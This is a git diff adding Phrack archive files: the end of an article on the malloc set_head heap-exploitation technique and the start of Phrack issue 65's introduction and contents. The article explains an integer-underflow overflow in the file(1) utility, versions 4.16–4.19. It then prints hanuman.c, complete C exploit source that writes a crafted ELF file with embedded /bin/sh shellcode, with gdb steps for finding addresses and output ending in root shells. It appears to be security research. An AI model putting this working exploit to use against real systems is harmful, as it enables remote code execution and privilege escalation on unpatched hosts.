+bash$ ./exp2 0xbffffffc 0x80496b4 0x804a6a8 | ./scenario2
+--[ Using 0x804a6a8 as the top chunk location.
+--[ Using 0xbffffffc as the return location.
+--[ Impossible to use 0x80496b4 as the return address. Using 0x80496b9
+instead
+[...]
+--[ Using 0xbffff6a4 as the return location.
+--[ Impossible to use 0x804a00c as the return address. Using 0x804a011
+instead
+uid=0(root) gid=0(root) groups=0(root)
+bash$
+
+
+----[ 6.2 - A real case scenario: file(1) utility
+
+The set_head technique was developed during the research of a security hole
+in the UNIX file(1) utility.  This utility is an automatic file content
+type recognition tool found on many UNIX systems.  The versions affected
+are Ian Darwin's version 4.00 to 4.19, maintained by Christos Zoulas.  This
+version is the standard version of file(1) for Linux, *BSD, and other
+systems, maintained by Christos Zoulas.
+
+The main reason why so much energy was put in the development of this
+exploit is mainly because the presence of a vulnerability in this utility
+represents a high security risk for an SMTP content filter.
+
+An SMTP content filter is a system that acts after the SMTP server receives
+email and applies various filtering policies defined by a network
+administrator.  Once the scanning process is finished, the filter decides
+whether the message will be relayed or not.
+
+An SMTP content filter needs to be able to call different kind of programs
+on an incoming email:
+
+        - Dearchivers;
+        - Decoders;
+        - Classifiers;
+        - Antivirus;
+        - and many more ...
+
+The file(1) utility falls under the "classifiers" category.
+
+This attack vector gives a complete new meaning to vulnerabilities that
+were classified as low risk.
+
+The author of this paper is also the maintainer of PIRANA [7], an
+exploitation framework that tests the security of an email content filter.
+By means of a vulnerability database, the content filter to be tested will
+be bombarded by various emails containing a malicious payload intended to
+compromise the computing platform.  PIRANA's goal is to test whether or not
+any vulnerability exists on the content filtering platform.
+
+
+------[ 6.2.1 - The hole
+
+The security vulnerability is in the file_printf() function.  This function
+fills the content of the 'ms->o.buf' buffer with the characteristics of the
+inspected file.  Once this is done, the buffer is printed on the screen,
+showing what type of file was detected.  Here is the vulnerable function:
+
+--[ From file-4.19/src/funcs.c
+
+01 protected int
+02 file_printf(struct magic_set *ms, const char *fmt, ...)
+03 {
+04         va_list ap;
+05         size_t len;
+06         char *buf;
+07
+08         va_start(ap, fmt);
+09         if ((len = vsnprintf(ms->o.ptr, ms->o.len, fmt, ap)) >= ms->
+o.len) {
+10                 va_end(ap);
+11                 if ((buf = realloc(ms->o.buf, len + 1024)) == NULL) {
+12                         file_oomem(ms, len + 1024);
+13                         return -1;
+14                 }
+15                 ms->o.ptr = buf + (ms->o.ptr - ms->o.buf);
+16                 ms->o.buf = buf;
+17                 ms->o.len = ms->o.size - (ms->o.ptr - ms->o.buf);
+18                 ms->o.size = len + 1024;
+19
+20                 va_start(ap, fmt);
+21                 len = vsnprintf(ms->o.ptr, ms->o.len, fmt, ap);
+22         }
+23         ms->o.ptr += len;
+24         ms->o.len -= len;
+25         va_end(ap);
+26         return 0;
+27 }
+
+At first sight, this function seems to take good care of not overflowing
+the 'ms->o.ptr' buffer.  A first copy is done at line 09.  If the
+destination buffer, 'ms->o.buf', is not big enough to receive the character
+string, the memory region is reallocated.
+
+The reallocation is done at line 11, but the new size is not computed
+properly.  Indeed, the function assumes that the buffer should never be
+bigger than 1024 added to the current length of the processed string.
+
+The real problem is at line 21.  The variable 'ms->o.len' represents the
+number of bytes left in 'ms->o.buf'.  The variable 'len', on the other
+hand, represents the  number  of  characters (not  including the trailing
+'\0') which would have been written to the final string if enough space had
+been available.  In the event that the buffer to be printed would be larger
+than 'ms->o.len', 'len' would contain a value greater than 'ms->o.len'.
+Then, at line 24, 'len' would get subtracted from 'ms->o.len'.  'ms->o.len'
+could underflow below 0, and it would become a very big positive integer
+because 'ms->o.len' is of type 'size_t'.  Subsequent vsnprintf() calls
+would then receive a very big length parameter thus rendering any bound
+checking capabilities useless.
+
+
+------[ 6.2.2 - All the pieces fall into place
+
+There is an interesting portion of code in the function donote()/readelf.c.
+There is a call to the vulnerable function, file_printf(), with a
+user-supplied buffer.  By taking advantage of this code, it will be a lot
+simpler to write a successful exploit.  Indeed, it will be possible to
+overwrite the chunk information with arbitrary values.
+
+        --[ From file-4.19/src/readelf.c
+
+          /*
+           * Extract the program name.  It is at
+           * offset 0x7c, and is up to 32-bytes,
+           * including the terminating NUL.
+           */
+          if (file_printf(ms, ", from '%.31s'",
+              &nbuf[doff + 0x7c]) == -1)
+                  return size;
+
+
+After a couple of tries overflowing the header of the next chunk, it was
+clear that the only thing that was overflowable was the wilderness chunk.
+It was not possible to provoke a situation where a chunk that was not
+adjacent to the top chunk could be overflowable with user controllable
+data.
+
+The file utility suffers from this buffer overflow since the 4.00 release
+when the first version of file_printf() was introduced.  A successful
+exploitation was only possible starting from version 4.16.  Indeed, this
+version included a call to malloc with a user controllable variable.  From
+readelf.c:
+
+        --[ From file-4.19/src/readelf.c
+
+          if ((nbuf = malloc((size_t)xsh_size)) == NULL) {
+           file_error(ms, errno, "Cannot allocate memory"
+               " for note");
+           return -1;
+
+This was the missing piece of the puzzle.  Now, every condition is met to
+use the set_head() technique.
+
+
+------[ 6.2.3 - hanuman.c
+
+/*
+ * hanuman.c
+ *
+ * file(1) exploit for version 4.16 to 4.19.
+ * Coded by Jean-Sebastien Guay-Leroux
+ * http://www.guay-leroux.com
+ *
+ */
+
+
+/*
+
+Here are the steps to find the 3 memory values to use for the file(1)
+exploit.
+
+
+1- The first step is to generate a core dump file from file(1).  You will
+then have to analyze this core dump to find the proper values for your
+exploit.
+
+To generate the core file, get an approximation of the top chunk location
+by getting the base address of the BSS section:
+
+bash# readelf -S /usr/bin/file
+
+Section Headers:
+  [Nr] Name              Type            Addr
+  [ 0]                   NULL            00000000
+  [ 1] .interp           PROGBITS        080480f4
+  [...]
+  [22] .bss              NOBITS          0804b1e0
+
+The BSS section starts at 0x0804b1e0.  Let's call the exploit the following
+way, and remember to replace 0x0804b1e0 for the BSS value you have found:
+
+bash# ./hanuman 0xc0c0c0c0 0x0804b1e0 0x0804b1e0 mal
+--[ Using 0x804b1e0 as the top chunk location.
+--[ Impossible to use 0xc0c0c0c0 as the return location. Using 0xc0c0c0c4
+instead
+--[ Impossible to use 0x804b1e0 as the return address. Using 0x804b1e1
+instead
+--[ The file has been written
+bash# file mal
+Segmentation fault (core dumped)
+bash#
+
+
+2- Call gdb on that core dump file.
+
+bash# gdb -q file core.14854
+Core was generated by `file mal'.
+Program terminated with signal 11, Segmentation fault.
+Reading symbols from /usr/local/lib/libmagic.so.1...done.
+Loaded symbols for /usr/local/lib/libmagic.so.1
+Reading symbols from /lib/i686/libc.so.6...done.
+Loaded symbols for /lib/i686/libc.so.6
+Reading symbols from /lib/ld-linux.so.2...done.
+Loaded symbols for /lib/ld-linux.so.2
+Reading symbols from /usr/lib/gconv/ISO8859-1.so...done.
+Loaded symbols for /usr/lib/gconv/ISO8859-1.so
+#0  0x400a3d15 in mallopt () from /lib/i686/libc.so.6
+(gdb)
+
+
+3- The EAX register contains the address of the top chunk.  It might be
+another register for you.
+
+(gdb) info reg eax
+eax            0x80614f8        134616312
+(gdb)
+
+
+4- Start searching from the location of the top chunk to find the NOP
+cushion.  This will be the return address.
+
+0x80614f8:      0xc0c0c0c1      0xb8bc0ee1      0xc0c0c0c1      0xc0c0c0c1
+0x8061508:      0xc0c0c0c1      0xc0c0c0c1      0x73282027      0x616e6769
+0x8061518:      0x2930206c      0x90909000      0x90909090      0x90909090
+0x8061528:      0x90909090      0x90909090      0x90909090      0x90909090
+0x8061538:      0x90909090      0x90909090      0x90909090      0x90909090
+0x8061548:      0x90909090      0x90909090      0x90909090      0x90909090
+0x8061558:      0x90909090      0x90909090      0x90909090      0x90909090
+0x8061568:      0x90909090      0x90909090      0x90909090      0x90909090
+0x8061578:      0x90909090      0x90909090      0x90909090      0x90909090
+0x8061588:      0x90909090      0x90909090      0x90909090      0x90909090
+0x8061598:      0x90909090      0x90909090      0x90909090      0x90909090
+0x80615a8:      0x90909090      0x90909090      0x90909090      0x90909090
+0x80615b8:      0x90909090      0x90909090
+(gdb)
+
+0x8061558 is a valid address.
+
+
+5- To get the return location for your exploit, get a saved EIP from a
+stack frame.
+
+(gdb) frame 3
+#3  0x4001f32e in file_tryelf (ms=0x804bc90, fd=3, buf=0x0, nbytes=8192) at
+readelf.c:1007
+1007                            if (doshn(ms, class, swap, fd,
+(gdb) x $ebp+4
+0xbffff7fc:     0x400172b3
+(gdb)
+
+0xbffff7fc is the return location.
+
+
+6- You can now call the exploit with the values that you have found.
+
+bash# ./new 0xbffff7fc 0x8061558 0x80614f8 mal
+--[ Using 0x80614f8 as the top chunk location.
+--[ Using 0xbffff7fc as the return location.
+--[ Impossible to use 0x8061558 as the return address. Using 0x8061559
+instead
+--[ The file has been written
+bash# file mal
+sh-2.05b#
+
+*/
+
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <stdint.h>
+
+
+#define DEBUG                           0
+
+
+#define initial_ELF_garbage             75
+//ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically
+// linked
+
+#define initial_netbsd_garbage          22
+//, NetBSD-style, from '
+
+#define post_netbsd_garbage             12
+//' (signal 0)
+
+
+// The following #define are from malloc.c and are used
+// to compute the values for the malloc size and the top chunk size.
+#define PREV_INUSE 0x1
+#define SIZE_BITS  0x7       // PREV_INUSE|IS_MMAPPED|NON_MAIN_ARENA
+#define SIZE_SZ (sizeof(size_t))
+#define MALLOC_ALIGNMENT (2 * SIZE_SZ)
+#define MALLOC_ALIGN_MASK (MALLOC_ALIGNMENT - 1)
+#define MIN_CHUNK_SIZE 16
+#define MINSIZE (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) \
+    & ~MALLOC_ALIGN_MASK))
+#define request2size(req) (((req) + SIZE_SZ + MALLOC_ALIGN_MASK \
+    < MINSIZE)?MINSIZE : ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) \
+    & ~MALLOC_ALIGN_MASK)
+
+
+// Offsets of the note entries in the file
+#define OFFSET_31_BYTES  2048
+#define OFFSET_N_BYTES   2304
+#define OFFSET_0_BYTES   2560
+#define OFFSET_OVERWRITE 2816
+#define OFFSET_SHELLCODE 4096
+
+
+/* linux_ia32_exec -  CMD=/bin/sh Size=68 Encoder=PexFnstenvSub
+   http://metasploit.com */
+unsigned char scode[] =
+"\x31\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x27"
+"\xe2\xc0\xb3\x83\xeb\xfc\xe2\xf4\x4d\xe9\x98\x2a\x75\x84\xa8\x9e"
+"\x44\x6b\x27\xdb\x08\x91\xa8\xb3\x4f\xcd\xa2\xda\x49\x6b\x23\xe1"
+"\xcf\xea\xc0\xb3\x27\xcd\xa2\xda\x49\xcd\xb3\xdb\x27\xb5\x93\x3a"
+"\xc6\x2f\x40\xb3";
+
+
+struct math {
+    int nnetbsd;
+    int nname;
+};
+
+struct sethead {
+    unsigned long topchunk_size;
+    unsigned long malloc_size;
+};
+
+
+// To be a little more independent, we ripped
+// the following ELF structures from elf.h
+typedef struct
+{
+    unsigned char e_ident[16];
+    uint16_t e_type;
+    uint16_t e_machine;
+    uint32_t e_version;
+    uint32_t e_entry;
+    uint32_t e_phoff;
+    uint32_t e_shoff;
+    uint32_t e_flags;
+    uint16_t e_ehsize;
+    uint16_t e_phentsize;
+    uint16_t e_phnum;
+    uint16_t e_shentsize;
+    uint16_t e_shnum;
+    uint16_t e_shstrndx;
+} Elf32_Ehdr;
+
+typedef struct
+{
+    uint32_t sh_name;
+    uint32_t sh_type;
+    uint32_t sh_flags;
+    uint32_t sh_addr;
+    uint32_t sh_offset;
+    uint32_t sh_size;
+    uint32_t sh_link;
+    uint32_t sh_info;
+    uint32_t sh_addralign;
+    uint32_t sh_entsize;
+} Elf32_Shdr;
+
+typedef struct
+{
+    uint32_t n_namesz;
+    uint32_t n_descsz;
+    uint32_t n_type;
+} Elf32_Nhdr;
+
+
+struct sethead * set_head_compute
+    (unsigned long retloc, unsigned long retadr, unsigned long toploc) {
+
+    unsigned long check_retloc, check_retadr;
+    struct sethead *shead;
+
+    shead = (struct sethead *) malloc (8);
+    if (shead == NULL) {
+        fprintf (stderr,
+            "--[ Could not allocate memory for sethead structure\n");
+        exit (1);
+    }
+
+    if ( (toploc % 8) != 0 ) {
+        fprintf (stderr,
+            "--[ Impossible to use 0x%x as the top chunk location.",
+            toploc);
+
+        toploc = toploc - (toploc % 8);
+        fprintf (stderr, "  Using 0x%x instead\n", toploc);
+    } else
+        fprintf (stderr,
+            "--[ Using 0x%x as the top chunk location.\n", toploc);
+
+    // The minus 8 is to take care of the normalization
+    // of the malloc parameter
+    shead->malloc_size = (retloc - toploc - 8);
+
+    // By adding the 8, we are able to sometimes perfectly hit
+    // the return address.  To hit it perfectly, retadr must be a multiple
+    // of 8 + 1 (for the PREV_INUSE flag).
+    shead->topchunk_size = (retadr + shead->malloc_size + 8) | PREV_INUSE;
+
+    if (shead->topchunk_size < shead->malloc_size) {
+        fprintf (stderr,
+            "--[ ERROR: topchunk size is less than malloc size.\n");
+        fprintf (stderr, "--[ Topchunk code will not be triggered\n");
+        exit (1);
+    }
+
+    check_retloc = (toploc + request2size (shead->malloc_size) + 4);
+    if (check_retloc != retloc) {
+        fprintf (stderr,
+            "--[ Impossible to use 0x%x as the return location. ", retloc);
+        fprintf (stderr, "Using 0x%x instead\n", check_retloc);
+    } else
+        fprintf (stderr, "--[ Using 0x%x as the return location.\n",
+            retloc);
+
+    check_retadr = ( (shead->topchunk_size & ~(SIZE_BITS))
+        - request2size (shead->malloc_size)) | PREV_INUSE;
+    if (check_retadr != retadr) {
+        fprintf (stderr,
+            "--[ Impossible to use 0x%x as the return address.", retadr);
+        fprintf (stderr, " Using 0x%x instead\n", check_retadr);
+    } else
+        fprintf (stderr, "--[ Using 0x%x as the return address.\n",
+            retadr);
+
+    return shead;
+}
+
+
+/*
+Not CPU friendly :)
+*/
+struct math *
+compute (int offset) {
+
+    int accumulator = 0;
+    int i, j;
+    struct math *math;
+
+    math = (struct math *) malloc (8);
+
+    if (math == NULL) {
+        printf ("--[ Could not allocate memory for math structure\n");
+        exit (1);
+    }
+
+    for (i = 1; i < 100;i++) {
+
+        for (j = 0; j < (i * 31); j++) {
+
+            accumulator = 0;
+            accumulator += initial_ELF_garbage;
+            accumulator += (i * (initial_netbsd_garbage +
+                post_netbsd_garbage));
+            accumulator += initial_netbsd_garbage;
+
+            accumulator += j;
+
+            if (accumulator == offset) {
+                math->nnetbsd = i;
+                math->nname = j;
+
+                return math;
+            }
+        }
+    }
+
+    // Failed to find a value
+    return 0;
+}
+
+
+void
+put_byte (char *ptr, unsigned char data) {
+    *ptr = data;
+}
+
+
+void
+put_longword (char *ptr, unsigned long data) {
+    put_byte (ptr, data);
+    put_byte (ptr + 1, data >> 8);
+    put_byte (ptr + 2, data >> 16);
+    put_byte (ptr + 3, data >> 24);
+}
+
+
+FILE *
+open_file (char *filename) {
+
+    FILE *fp;
+
+    fp = fopen ( filename , "w" );
+
+    if (!fp) {
+        perror ("Cant open file");
+        exit (1);
+    }
+
+    return fp;
+}
+
+void
+usage (char *progname) {
+
+    printf ("\nTo use:\n");
+    printf ("%s <return location> <return address> ", progname);
+    printf ("<topchunk location> <output filename>\n\n");
+
+    exit (1);
+}
+
+
+int
+main (int argc, char *argv[]) {
+
+    FILE *fp;
+    Elf32_Ehdr *elfhdr;
+    Elf32_Shdr *elfshdr;
+    Elf32_Nhdr *elfnhdr;
+    char *filename;
+    char *buffer, *ptr;
+    int i;
+    struct math *math;
+    struct sethead *shead;
+    int left_bytes;
+    unsigned long retloc, retadr, toploc;
+    unsigned long topchunk_size, malloc_size;
+
+    if ( argc != 5) {
+        usage ( argv[0] );
+    }
+
+    sscanf (argv[1], "0x%x", &retloc);
+    sscanf (argv[2], "0x%x", &retadr);
+    sscanf (argv[3], "0x%x", &toploc);
+
+    filename = (char *) malloc (256);
+    if (filename == NULL) {
+        printf ("--[ Cannot allocate memory for filename...\n");
+        exit (1);
+    }
+    strncpy (filename, argv[4], 255);
+
+    buffer = (char *) malloc (8192);
+    if (buffer == NULL) {
+        printf ("--[ Cannot allocate memory for file buffer\n");
+        exit (1);
+    }
+    memset (buffer, 0, 8192);
+
+    math = compute (1036);
+    if (!math) {
+        printf ("--[ Unable to compute a value\n");
+        exit (1);
+    }
+
+    shead = set_head_compute (retloc, retadr, toploc);
+    topchunk_size = shead->topchunk_size;
+    malloc_size = shead->malloc_size;
+
+
+    ptr = buffer;
+    elfhdr = (Elf32_Ehdr *) ptr;
+
+    // Fill our ELF header
+    sprintf(elfhdr->e_ident,"\x7f\x45\x4c\x46\x01\x01\x01");
+    elfhdr->e_type =            2;       // ET_EXEC
+    elfhdr->e_machine =         3;       // EM_386
+    elfhdr->e_version =         1;       // EV_CURRENT
+    elfhdr->e_entry =           0;
+    elfhdr->e_phoff =           0;
+    elfhdr->e_shoff =           52;
+    elfhdr->e_flags =           0;
+    elfhdr->e_ehsize =          52;
+    elfhdr->e_phentsize =       32;
+    elfhdr->e_phnum =           0;
+    elfhdr->e_shentsize =       40;
+    elfhdr->e_shnum =           math->nnetbsd + 2;
+    elfhdr->e_shstrndx =        0;
+
+
+    ptr += elfhdr->e_ehsize;
+    elfshdr = (Elf32_Shdr *) ptr;
+
+    // This loop lets us eat an arbitrary number of bytes in ms->o.buf
+    left_bytes = math->nname;
+    for (i = 0; i < math->nnetbsd; i++) {
+        elfshdr->sh_name        = 0;
+        elfshdr->sh_type        = 7;   // SHT_NOTE
+        elfshdr->sh_flags       = 0;
+        elfshdr->sh_addr        = 0;
+        elfshdr->sh_size        = 256;
+        elfshdr->sh_link        = 0;
+        elfshdr->sh_info        = 0;
+        elfshdr->sh_addralign   = 0;
+        elfshdr->sh_entsize     = 0;
+
+        if (left_bytes > 31) {
+            // filename == 31
+            elfshdr->sh_offset = OFFSET_31_BYTES;
+            left_bytes -= 31;
+        } else if (left_bytes != 0) {
+            // filename < 31 && != 0
+            elfshdr->sh_offset = OFFSET_N_BYTES;
+            left_bytes = 0;
+        } else {
+            // filename == 0
+            elfshdr->sh_offset = OFFSET_0_BYTES;
+        }
+
+        // The first section header will also let us load
+        // the shellcode in memory :)
+        // Indeed, by requesting a large memory block,
+        // the topchunk will be splitted, and this memory region
+        // will be left untouched until we need it.
+        // We assume its name is 31 bytes long.
+        if (i == 0) {
+            elfshdr->sh_size = 4096;
+            elfshdr->sh_offset = OFFSET_SHELLCODE;
+        }
+
+        elfshdr++;
+    }
+
+
+    // This section header entry is for the data that will
+    // overwrite the topchunk size pointer
+    elfshdr->sh_name        = 0;
+    elfshdr->sh_type        = 7;      // SHT_NOTE
+    elfshdr->sh_flags       = 0;
+    elfshdr->sh_addr        = 0;
+    elfshdr->sh_offset      = OFFSET_OVERWRITE;
+    elfshdr->sh_size        = 256;
+    elfshdr->sh_link        = 0;
+    elfshdr->sh_info        = 0;
+    elfshdr->sh_addralign   = 0;
+    elfshdr->sh_entsize     = 0;
+    elfshdr++;
+
+
+    // This section header entry triggers the call to malloc
+    // with a user supplied length.
+    // It is a requirement for the set_head technique to work
+    elfshdr->sh_name        = 0;
+    elfshdr->sh_type        = 7;     // SHT_NOTE
+    elfshdr->sh_flags       = 0;
+    elfshdr->sh_addr        = 0;
+    elfshdr->sh_offset      = OFFSET_N_BYTES;
+    elfshdr->sh_size        = malloc_size;
+    elfshdr->sh_link        = 0;
+    elfshdr->sh_info        = 0;
+    elfshdr->sh_addralign   = 0;
+    elfshdr->sh_entsize     = 0;
+    elfshdr++;
+
+
+    // This note entry lets us eat 31 bytes + overhead
+    elfnhdr = (Elf32_Nhdr *) (buffer + OFFSET_31_BYTES);
+    elfnhdr->n_namesz       = 12;
+    elfnhdr->n_descsz       = 12;
+    elfnhdr->n_type         = 1;
+    ptr = buffer + OFFSET_31_BYTES + 12;
+    sprintf (ptr, "NetBSD-CORE");
+    sprintf (buffer + OFFSET_31_BYTES + 24 + 0x7c,
+        "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB");
+
+
+    // This note entry lets us eat an arbitrary number of bytes + overhead
+    elfnhdr = (Elf32_Nhdr *) (buffer + OFFSET_N_BYTES);
+    elfnhdr->n_namesz       = 12;
+    elfnhdr->n_descsz       = 12;
+    elfnhdr->n_type         = 1;
+    ptr = buffer + OFFSET_N_BYTES + 12;
+    sprintf (ptr, "NetBSD-CORE");
+    for (i = 0; i < (math->nname % 31); i++)
+        buffer[OFFSET_N_BYTES+24+0x7c+i]='B';
+
+
+    // This note entry lets us eat 0 bytes + overhead
+    elfnhdr = (Elf32_Nhdr *) (buffer + OFFSET_0_BYTES);
+    elfnhdr->n_namesz       = 12;
+    elfnhdr->n_descsz       = 12;
+    elfnhdr->n_type         = 1;
+    ptr = buffer + OFFSET_0_BYTES + 12;
+    sprintf (ptr, "NetBSD-CORE");
+    buffer[OFFSET_0_BYTES+24+0x7c]=0;
+
+
+    // This note entry lets us specify the value that will
+    // overwrite the topchunk size
+    elfnhdr = (Elf32_Nhdr *) (buffer + OFFSET_OVERWRITE);
+    elfnhdr->n_namesz       = 12;
+    elfnhdr->n_descsz       = 12;
+    elfnhdr->n_type         = 1;
+    ptr = buffer + OFFSET_OVERWRITE + 12;
+    sprintf (ptr, "NetBSD-CORE");
+    // Put the new topchunk size 7 times in memory
+    // The note entry program name is at a specific, odd offset (24+0x7c)?
+    for (i = 0; i < 7; i++)
+        put_longword (buffer + OFFSET_OVERWRITE + 24 + 0x7c + (i * 4),
+            topchunk_size);
+
+
+    // This note entry lets us eat 31 bytes + overhead, but
+    // its real purpose is to load the shellcode in memory.
+    // We assume that its name is 31 bytes long.
+    elfnhdr = (Elf32_Nhdr *) (buffer + OFFSET_SHELLCODE);
+    elfnhdr->n_namesz       = 12;
+    elfnhdr->n_descsz       = 12;
+    elfnhdr->n_type         = 1;
+    ptr = buffer + OFFSET_SHELLCODE + 12;
+    sprintf (ptr, "NetBSD-CORE");
+    sprintf (buffer + OFFSET_SHELLCODE + 24 + 0x7c,
+         "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB");
+
+
+    // Fill this memory region with our shellcode.
+    // Remember to leave the note entry untouched ...
+    memset (buffer + OFFSET_SHELLCODE + 256, 0x90, 4096-256);
+    sprintf (buffer + 8191 - strlen (scode), scode);
+
+
+    fp = open_file (filename);
+    if (fwrite (buffer, 8192, 1, fp) != 0 ) {
+        printf ("--[ The file has been written\n");
+    } else {
+        printf ("--[ Can not write to the file\n");
+        exit (1);
+    }
+    fclose (fp);
+
+
+    free (shead);
+    free (math);
+    free (buffer);
+    free (filename);
+
+
+    return 0;
+}
+
+
+--[ 7 - Final words
+
+That's all for the details of this technique; a lot has already been said
+through this paper.  By looking at the complexity of the malloc code, there
+are probably many other ways to take control of a process by corrupting the
+malloc chunks.
+
+Of course, this paper explains the technical details of set_head, but
+personally, I think that all the exploitation techniques are ephemeral.
+This is more true, especially recently, with all the low level security
+controls that were added to the modern operating systems.  Beside having
+great technical skills, I personally think it's important to develop your
+mental skills and your creativity.  Try to improve your attitude when
+solving a difficult problem.  Develop your perseverance and determination,
+even though you may have failed at the same thing 20, 50 or 100 times in a
+row.
+
+I would like to greet the following individuals: bond, dp, jinx,
+Michael and nitr0gen.  There is more people that I forget. Thanks for the
+help and the great conversations we had over the last few years.
+
+
+--[ 8 - References
+
+1. Solar Designer, http://www.openwall.com/advisories/OW-002-netscape-jpeg/
+
+2. Anonymous, http://www.phrack.org/archives/57/p57-0x09
+
+3. Kaempf, Michel, http://www.phrack.org/archives/57/p57-0x08
+
+4. Phantasmal Phantasmagoria,
+http://www.packetstormsecurity.org/papers/attack/MallocMaleficarum.txt
+
+5. Phantasmal Phantasmagoria,
+http://seclists.org/vuln-dev/2004/Feb/0025.html
+
+6. jp,
+http://www.phrack.org/archives/61/p61-0x06_Advanced_malloc_exploits.txt
+
+7. Guay-Leroux, Jean-Sebastien, http://www.guay-leroux.com/projects.html
+
+8. gera, http://www.phrack.org/archives/59/p59-0x07.txt
+
+9. The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+(2004), Wiley
diff --git a/phrack65/1.txt b/phrack65/1.txt
new file mode 100644
index 0000000..4676a9c
--- /dev/null
+++ b/phrack65/1.txt
@@ -0,0 +1,275 @@
+				==Phrack Inc.==
+
+		Volume 0x0c, Issue 0x41, Phile #0x01 of 0x0f
+
+|=-----------------------------------------------------------------------=|
+|=--------------------------=[ Introduction ]=---------------------------=|
+|=-----------------------------------------------------------------------=|
+|=-------------------=[ By The Circle of Lost Hackers ]=-----------------=|
+|=-----------------------------------------------------------------------=|
+
+
+Welcome back. 
+
+Another year has passed, another PHRACK issue is out, PHRACK65.
+
+Every time somebody gives me a present I end up thinking to the story of 
+that gift. Where did it come from ? Who worked on it ? Did who worked on 
+it ever thought that his work would have end up in my hands ? 
+
+What about a PHRACK issue ? 
+
+PHRACK comes from the underground, the underground worked on it, submitting
+papers, sending feedback, commenting, spending long night chatting,
+reading, BREATHING. Does the underground still breath ? 
+
+Things change, panta rei. As hackers, we have fun. We want fun. Hacking is
+fun. You know it because you did it, because you spent nights and nights on
+this fucking fun, going to sleep at 6 a.m. and waking up three hours later
+to present your face at school or work, with your brain still back home on
+your encrypted work. Are you still having fun ? 
+
+Please, don't take it personally, don't over-react. It's just a question.
+A question that everybody should pose to themselves every single day, no
+matter what he is doing. FUN is not only PAYBACK. We are human, we love
+receiving congrats, who doesn't ? We LOVE seeing our little work spread
+around. We love the clap-clap-clap sound. But does it really boil down only
+to that ? 
+
+When you lose fun and start doing things only for the payback, you're dead.
+Everyone of you who experienced a bad job or a bad exam topic knows the
+feeling of "wasting time on useless things" that pops out in those moments.
+But, most of the time, you _HAVE TO_ do it. 
+
+Well, nobody _HAS TO DO_ hacking. Nobody.
+
+If you are only doing that for a payback, than you are a DEAD hacker.
+If you are only doing that to present a paper to a conference, to see your 
+name somewhere, than you are a DEAD hacker.
+
+It will work. You don't need fun to be skilled, you don't even need to be
+skilled to post or to go to a conference, there are so many around that
+everybody has some hole to fix. But your touch with the underground is
+gone. Your responsibility towards friends, ideas, codes will slowly fade
+away. HACKING is also responsibility and FUN is the only way to not feel 
+its pressure
+
+You might disagree, just post on your idea. Maybe it is a too dark 
+scenario, maybe it is just a spring blues, maybe I am just pessimistic, but
+this is the feeling. This is money taking over everywhere, this is seeing
+more and more things done only for the payback.
+
+This is seeing the underground heart beating slower and slower. 
+
+PHRACK is just an example of what the underground has been able to do. Of
+what we can do. But so many hackers out there are capable of disrupting the
+system without having to read or write a magazine like we do. We are 
+entering into a period where Government and Politics are trying to control 
+technology with supposed-anti-terrorism laws. And they don't lack money 
+or good congrats.
+
+So please, please, help this fucking heart beating faster, pushing blood
+around. Please HAVE FUN. 
+
+This is the 65th edition of Phrack and we are still alive. Despite that
+some people say they don't learn anything when reading phrack we still 
+think that Phrack is one of the best underground communication methods. Oh
+well, for sure, there are other and even better ways. But Phrack is one way
+and probably not the worse. We have tried to release this issue earlier but
+editing a magazine (and especially Phrack) is not easy. We have received a
+lot of positive comments after Phrack release #64 and a lot of people said
+they will contribute. However we did not see anything coming. Almost all
+articles from this release are coming from our first circle of friends.
+Again.
+
+This release, despite that it is not the perfect one, tries to bring
+a good mix between technical articles and what we call spirit articles. Our
+introducing and concluding articles (Phrack Prophile and The Underground
+Myth) bring two opposite visions of the hacking underground. 
+
+Contradiction? No. Freedom of speech.
+
+We have kept with our regular columns Phrack World News and International 
+Scenes. We also have decided to publish less exploit articles. However, 
+low-level hackers should find their way easily into this new release.
+
+
+[-]=====================================================================[-]
+
+
+For this issue, we are bringing you the following :
+
+
+0x01 Introduction                                                      TCLH
+0x02 Phrack Prophile of The UNIX Terrorist                             TCLH
+0x03 Phrack World News                                                 TCLH
+0x04 Stealth Hooking: another way to subvert the Windows kernel     mxatone
+                                                                  ivanlefou
+0x05 Clawing holes in NAT with UPnP                            felinemenace
+0x06 The only laws on Internet are assembly and RFCs                  Julia
+0x07 Hacking the System Management Mode       BSDaemon, coideloko, d0nand0n
+0x08 Mystifying the debugger for ultimate stealthness              halfdead
+0x09 Australian Restricted Defense Networks and FISSO              The Finn
+0x0a Phook - The PEB Hooker                                  shearer & dreg
+0x0b Hacking the $49 Wifi Finder                                openschemes
+0x0c The art of exploitation: Samba WINS stack overflow         max_packetz
+0x0d The Underground Myth                                         anonymous
+0x0e Hacking your brain: Artificial Conciousness                         -C
+0x0f International scenes                                           various
+
+
+Windows stealth hooking article brings a deep analysis of the XP kernel 
+internals by presenting two sophisticated backdooring techniques. It is 
+generally hard to find valuable reverse engineering articles covering
+*new* topics and satisfying our standards, but these guys have made a great
+job. Make sure also to check out the PEB Hooker and the full published 
+source code if M$ software reversing is your thing. Both of those articles
+will bring you a very good read.
+
+Felinemenace is featured again and brings you one of their latest hacks on 
+more recent network protocols. Our second network article digs into FISSO
+by introducing not-so-public information about australian restricted
+networks. 
+
+As we continue to care about cryptography, Phrack #65 includes a useful 
+cryptographic concept of deniable encryption, a particulary relevant topic 
+for hackers. Check out Julia's article for all details.
+
+As mentioned, we have tried to bring you the best low-level hacking around.
+Articles such as Hacking the System Management Mode, Hacking the $49 Wifi 
+Finder, Mystifying the debugger, are not really 0day for those of you
+already in the underground, but aim to bring you sufficiently material to
+develop your creativity on that matter.
+
+Finally, we could not release Phrack without at least one exploitation
+article. Max Packets has done the job of describing step by step his
+Samba WINS exploit. The information contained herein will certainly be
+enough for those of you guys who want to develop their own.
+
+Scene Shoutz:
+-------------
+
+Again, Phrack #65 could not have happened without so many people. Thanks
+to the admins, coders, hackers, scripterz.
+
+Shouts : mauro, sysk, leandro, assad, kiwicon for an amazing conference 
+with a lot of original topics. As long as you stay a non profit event 
+Phrack will support you! We are also looking forward to the next BACon in 
